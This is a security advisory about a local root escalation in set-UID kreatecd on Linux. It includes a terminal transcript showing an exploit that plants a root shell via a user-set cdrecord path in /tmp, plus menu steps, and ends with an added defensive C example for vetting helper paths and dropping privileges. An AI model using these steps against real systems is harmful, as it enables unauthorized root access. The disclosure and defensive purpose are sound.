Vulnerability

    kreatecd

Affected

    Any system which has kreatecd installed as set-UID root

Description

The following is based on a TESO Security Advisory.

A vulnerability within the kreatecd application for Linux has been discovered. An attacker can gain local root access. This affects any system which has kreatecd installed as set-UID root, including installations done with a "configure; make; make install" procedure. Among the vulnerable distributions (if the package is installed) are Halloween Linux Version 4 and SuSE 6.x.

Tests:

[stealth@liane stealth]$ stat `which kreatecd`
  File: "/usr/bin/kreatecd"
  Size: 229068      Filetype: Regular File
  Mode: (4755/-rwsr-xr-x)         Uid: (    0/    root)  Gid: (    0/    root)
Device:  3,1   Inode: 360053    Links: 1
Access: Tue Mar 14 14:48:21 2000(00000.00:00:45)
Modify: Tue Mar 14 14:48:21 2000(00000.00:00:45)
Change: Tue Mar 14 14:48:21 2000(00000.00:00:45)
[stealth@liane stealth]$ id
uid=500(stealth) gid=500(stealth) groups=500(stealth)
[stealth@liane stealth]$ /tmp/kreatur
(... some diagnostic messages ...)
Creating suid-maker...
Creating boom-shell...
Execute kreatecd and follow the menus:
Configure -> Paths -- change the path for cdrecord to /tmp/xxx
Apply -> OK
Configure -> SCSI -> OK
Execute /tmp/boomsh
BEHAVE!
(poking around with GUI...)
[stealth@liane stealth]$ /tmp/boomsh
[root@liane stealth]# id
uid=0(root) gid=500(stealth) groups=500(stealth)
[root@liane stealth]#

An attacker may gain local root access to a system where the vulnerable kreatecd package is installed. It might be difficult for a remote attacker who has gained local user access, due to the GUI nature of the vulnerable program.

kreatecd, which runs with a saved user-id of 0, blindly trusts paths to CD-recording software given by an unprivileged user. It then invokes this software with an EUID of 0 when the user merely clicks around in the menus.

The bug discovery and the demonstration programs are due to S. Krahmer. There is a working demonstration program to exploit the vulnerability.

The exploit is available from http://teso.scene.at/ or https://teso.scene.at/ and http://www.cs.uni-potsdam.de/homepages/students/linuxer

Solution

The author and the distributor have been informed beforehand. Remove the suid bit from kreatecd.
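As an added example (this code is not from the TESO advisory or the kreatecd project), the following shows the two things the advisory says kreatecd did not do: vet a user-configurable helper path before executing it, and drop the saved/effective root credentials before running anything the user chose. The function names `is_setuid_root`, `helper_path_is_trusted` and `run_helper_unprivileged` are this example's own; `is_setuid_root` mirrors the `stat` check from the Tests section and can be used to confirm that the suid bit has actually been removed after applying the Solution.

```c
/* Added example: vetting a user-supplied helper path in a set-UID root
 * program and dropping privileges before exec. Not kreatecd code. */
#define _GNU_SOURCE
#include <libgen.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Mirrors the advisory's `stat` test: 1 if `path` is a regular file that is
 * owned by root and carries the set-UID bit (mode 4xxx), else 0. */
int is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && st.st_uid == 0 && (st.st_mode & S_ISUID) != 0;
}

/* Returns 1 only if `path` is an absolute path to an existing, regular,
 * root-owned, executable file that is not group/world-writable and that
 * lives in a root-owned directory that is not group/world-writable.
 * A value such as /tmp/xxx (the advisory's example) is rejected because
 * /tmp is world-writable: an unprivileged user can place any program there.
 * Hypothetical helper, not an API of kreatecd. */
int helper_path_is_trusted(const char *path)
{
    char resolved[PATH_MAX];
    char dirbuf[PATH_MAX];
    struct stat st;

    if (path == NULL || path[0] != '/')
        return 0;                       /* relative paths depend on cwd/PATH */
    if (realpath(path, resolved) == NULL)
        return 0;                       /* must exist; symlinks are resolved */
    if (stat(resolved, &st) != 0)
        return 0;
    if (!S_ISREG(st.st_mode) || st.st_uid != 0)
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;                       /* others could rewrite its contents */
    if (!(st.st_mode & S_IXUSR))
        return 0;

    /* The containing directory matters too: a writable directory lets
     * anyone replace the file regardless of the file's own mode. */
    strncpy(dirbuf, resolved, sizeof dirbuf - 1);
    dirbuf[sizeof dirbuf - 1] = '\0';
    const char *dir = dirname(dirbuf);
    if (stat(dir, &st) != 0)
        return 0;
    if (st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;
    return 1;
}

/* Execute a vetted helper with the real (unprivileged) user's credentials.
 * Returns -1 without executing anything if the path fails the checks or
 * privileges cannot be dropped; on success execv does not return.
 * setuid() called with EUID 0 resets real, effective AND saved UID, so the
 * child cannot regain root the way the advisory describes. */
int run_helper_unprivileged(const char *path, char *const argv[])
{
    if (!helper_path_is_trusted(path))
        return -1;
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    if (getuid() != geteuid() || setuid(0) == 0)
        return -1;                      /* privilege drop did not stick */
    execv(path, argv);
    return -1;
}

int main(int argc, char **argv)
{
    /* Report, for each path given on the command line, whether it is a
     * set-UID root binary and whether it would be accepted as a helper. */
    for (int i = 1; i < argc; i++)
        printf("%s: setuid-root=%d trusted-helper=%d\n", argv[i],
               is_setuid_root(argv[i]), helper_path_is_trusted(argv[i]));
    return 0;
}
```

Build it with any C compiler and pass one or more paths as arguments, for example `/usr/bin/kreatecd` and `/tmp/xxx`. The directory check is what defeats the advisory's scenario: even a root-owned, mode-0755 file under /tmp is rejected, because the sticky bit on /tmp does not stop an unprivileged user from creating a differently named file there and pointing the configuration at it.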